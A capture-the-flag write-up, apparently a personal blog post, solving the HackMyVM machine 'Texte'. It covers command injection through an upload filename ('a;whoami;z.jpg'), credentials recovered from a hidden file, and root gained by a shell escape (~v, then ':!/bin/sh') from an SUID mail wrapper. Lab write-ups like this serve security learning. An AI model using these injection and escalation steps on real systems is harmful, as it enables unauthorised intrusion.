HackMyVM: Texte

This is Texte. It’s Medium rated, and it was pretty great.

Ports

SSH and HTTP only.

HTTP

The frontpage has a simple UI to upload a file, and says:

Dont upload .PHP FILES! STOP BITCHING.

Lol. I run a dirsearch, but there’s nothing else. I try a text file and get the message:

File not allowed.

That surprised me a bit. Next I try a JPG, and it’s fine. What happens though is the file doesn’t seem to get saved anywhere, but it is inserted into the response as a base64 encoded PNG. So we have some sort of image processing on the server. I assume it might be ImageTragick, but trying some payloads demonstrates this is definitely not the case. Some googling leads me to this page, and I find we do have command injection in the filename.

filename="a;whoami;z.jpg"

Gives

<img src="data:image/png;base64,www-data " alt="Happy" />

I try a few shell payloads but get nothing, it doesn’t seem to like spaces. So I try a simple ‘ls’ and get:

index.html
uiydasuiydasuicyxzuicyxziuctxzidsauidascxzAAA.txttxttxt
upload.php

Well, dirsearch/feroxbuster was never going to find that!

┌──(root💀kali)-[/opt/hackmyvm/texte]
└─# wget http://10.10.10.53/uiydasuiydasuicyxzuicyxziuctxzidsauidascxzAAA.txttxttxt                                                1 ⨯
--2022-01-05 04:39:34--  http://10.10.10.53/uiydasuiydasuicyxzuicyxziuctxzidsauidascxzAAA.txttxttxt
Connecting to 10.10.10.53:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23 [application/octet-stream]
Saving to: ‘uiydasuiydasuicyxzuicyxziuctxzidsauidascxzAAA.txttxttxt’

uiydasuiydasuicyxzuicyxziuctxzids 100%[============================================================>]      23  --.-KB/s    in 0s      

2022-01-05 04:39:34 (3.54 MB/s) - ‘uiydasuiydasuicyxzuicyxziuctxzidsauidascxzAAA.txttxttxt’ saved [23/23]

                                                                                                                                       
┌──(root💀kali)-[/opt/hackmyvm/texte]
└─# cat uiydasuiydasuicyxzuicyxziuctxzidsauidascxzAAA.txttxttxt 
kamila/hahaha$$$hahaha
                                                                                                                                       
┌──(root💀kali)-[/opt/hackmyvm/texte]
└─# ssh [email protected]
The authenticity of host '10.10.10.53 (10.10.10.53)' can't be established.
ED25519 key fingerprint is SHA256:3sK6QuqXMkzz9iqf8s+b9Hz1n9FnJFafQ1J2HnbOruk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.53' (ED25519) to the list of known hosts.
[email protected]'s password: 
Linux texte 5.10.0-8-686-pae #1 SMP Debian 5.10.46-5 (2021-09-23) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Oct  8 05:37:55 2021 from 192.168.1.51
kamila@texte:~$ sudo -l
-bash: sudo: command not found

Privesc

We’ve got an SUID binary in /opt:

kamila@texte:/opt$ ls -lash
total 24K
4.0K drwxr-xr-x  2 root root   4.0K Oct  8 05:46 .
4.0K drwxr-xr-x 18 root root   4.0K Oct  8 05:33 ..
 16K -rwsr-sr-x  1 root kamila  16K Oct  8 05:46 texte

If we run strings, we find this line:

/usr/bin/mail -s 'Remember,dont upload PHP files.' kamila@localhost

So we’ve got a fully quoted binary path, so no dice there. What is /usr/bin/mail?

 kamila@texte:/opt$ file /usr/bin/mail
/usr/bin/mail: symbolic link to /etc/alternatives/mail
kamila@texte:/opt$ file /etc/alternatives/mail
/etc/alternatives/mail: symbolic link to /usr/bin/mail.mailutils
kamila@texte:/opt$ file /usr/bin/mail.mailutils
/usr/bin/mail.mailutils: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=54d4a357c9c43e5e3dadb03ef7727a580964eaa0, for GNU/Linux 3.2.0, stripped

Right, so we have mail.mailutils. Running the program gives a simple interface to compose a mail message. The mail does get sent to kamila@localhost:

 kamila@texte:/opt$ cat /var/mail/kamila
From root@texte Wed Jan 05 04:47:47 2022
Return-path: <root@texte>
Envelope-to: kamila@localhost
Delivery-date: Wed, 05 Jan 2022 04:47:47 -0500
Received: from root by texte with local (Exim 4.94.2)
        (envelope-from <root@texte>)
        id 1n52tX-0003Xl-9o
        for kamila@localhost; Wed, 05 Jan 2022 04:47:47 -0500
Subject: Remember,dont upload PHP files.
To: <kamila@localhost>
X-Mailer: mail (GNU Mailutils 3.10)
Message-Id: <E1n52tX-0003Xl-9o@texte>
From: root@texte
Date: Wed, 05 Jan 2022 04:47:47 -0500

whatever
# etc

If we go and read the documentation, we can see that running ~v breaks us out into an editor, and then we can just do

:!/bin/sh

to get a root shell, and we’re done. I did try ~e first but it didn’t work:

 kamila@texte:/opt$ ./texte 
Cc: 
~e
/bin/bash: line 1: ed: command not found
(continue)
id

 ~v

# id;hostname;date
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(kamila)
texte
Wed 05 Jan 2022 04:55:14 AM EST
# cd /root
# ls -lash
total 24K
4.0K drwx------  3 root root 4.0K Oct  8 05:47 .
4.0K drwxr-xr-x 18 root root 4.0K Oct  8 05:33 ..
4.0K -rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
4.0K drwxr-xr-x  3 root root 4.0K Oct  8 05:43 .local
4.0K -rw-r--r--  1 root root  161 Jul  9  2019 .profile
4.0K -rw-------  1 root root   12 Oct  8 05:47 root.txt
#

I enjoyed this one :)